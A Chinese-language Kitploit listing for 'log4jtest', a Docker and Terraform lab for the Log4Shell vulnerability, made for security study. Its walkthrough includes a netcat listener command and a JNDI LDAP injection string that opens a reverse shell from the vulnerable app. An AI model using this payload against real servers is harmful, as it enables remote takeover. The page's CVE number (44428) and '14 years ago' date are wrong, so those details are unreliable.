Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4jtest — Terraform 和 Docker 资源,用于快速搭建 CVE-2021-44428 的测试环境。 | Kitploit
工具/GitHubGitHub/z3bul0n/log4jtest
云基础设施安全容器安全漏洞分析漏洞利用渗透测试学习与教育
GitHubz3bul0n/log4jtest

log4jtest

Terraform 和 Docker 资源,用于快速搭建 CVE-2021-44428 的测试环境。

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

简介

本仓库旨在利用 Docker 和 Hashicorp Terraform 快速测试 log4j 漏洞。该测试的所有组件都将运行在 Docker 网络中的 Docker 容器内,可通过 'host.docker.internal' 进行访问。

致谢 / 免责声明

该测试环境源自 Raxis 的一篇优秀博客文章:(https://raxis.com/blog/log4j-exploit)

易受攻击的应用程序和漏洞利用代码来自 cyberxml (https://github.com/cyberxml/log4j-poc)。

我所做的只是将环境代码化,使其易于快速启动并测试这个令人垂涎的漏洞。

对于因使用本仓库中的材料而可能导致的任何不良后果或恶意行为,我不承担任何责任。仅此而已。是否信任这些材料由你自行决定,同样,合乎道德地使用这些信息也是你的责任。我发布这些内容仅仅是为了让研究人员、学生和安全专业人士能够快速创建环境并自行测试该漏洞。Seacrest 到此结束。

前提条件

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

设置

  1. 克隆此仓库
  2. 在项目目录中运行 'terraform init'
  3. 启动 Docker 守护进程
  4. 运行 'docker-build.sh' bash 脚本以构建项目中的所有容器镜像。
  5. 运行 'terraform apply' 以创建项目中的所有容器。

漏洞利用

  1. 使用 'docker exec -it netcat /bin/bash' 或类似命令进入 log4j_netcat 容器。一旦连接建立,你将在此处接收到与受害服务器的 shell 连接。

  2. 在 log4j_netcat 容器内的会话中,输入以下命令以启动监听器:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. 在浏览器中,导航至 http://host.docker.internal:8080/log4shell/

  2. 在 'Username' 字段中输入以下内容,并在 'Password' 字段中输入任意内容:

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. 返回 log4j_netcat 容器 shell,观察到你已连接到受害服务器。

  2. 去尽情捣乱吧!

下载工具